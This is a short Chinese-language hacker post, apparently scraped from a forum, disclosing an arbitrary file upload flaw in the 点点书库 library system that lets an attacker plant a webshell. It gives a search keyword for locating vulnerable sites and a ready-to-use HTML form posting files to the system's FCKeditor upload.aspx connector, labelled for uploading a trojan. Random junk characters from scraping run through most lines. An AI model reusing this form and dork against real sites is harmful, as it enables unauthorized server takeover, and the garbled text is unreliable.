主题:图书馆系统任意文件上传漏洞) X5 z$ x6 i% K3 t
作者:冰锋刺客
& K6 ]6 C; B' x# }4 V: D7 o& N 厂商:点击书(dianjishu.com)) q4 e/ ~2 ]8 U: R& S
日期:2012-6-219 s3 S/ G# G6 v1 X/ X+ [9 `. v
1 }3 x/ [ O$ N6 u
I 概述
+ O# L6 c( k( h0 N' k 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
( _( T6 x; f; v& |9 @1 {" o* i. X II 简介
. v2 v2 C7 u- Z7 |4 a3 f4 v 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"* ?! }# O; \' {5 O4 ?0 L/ U) H
补充一个漏洞
9 L2 W4 H" o$ D. n7 T9 x* j% X <form id="frmUpload" enctype="multipart/form-data"% ~6 j3 B! t* _+ z/ r& _4 Q( R: ?$ Z
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
! W" V$ N1 U% T# o# ^ <input id="btnUpload" type="submit" value="操翻他">& }4 j+ L ~( g J% }* q# N
</form>
/ I3 O, y" B/ A3 F& Z" X 你们懂的1 I% y$ q6 X: Q& d+ i0 w0 k( u
那傻逼提供还需要改包.$ s$ B6 _5 j U( D) k+ E1 ~; I
自己看了下源代码发现fckeditor
: L5 S2 T: h0 E5 W e4 Q 直接秒杀
9 y9 A3 S }# O0 L" Y+ R; R |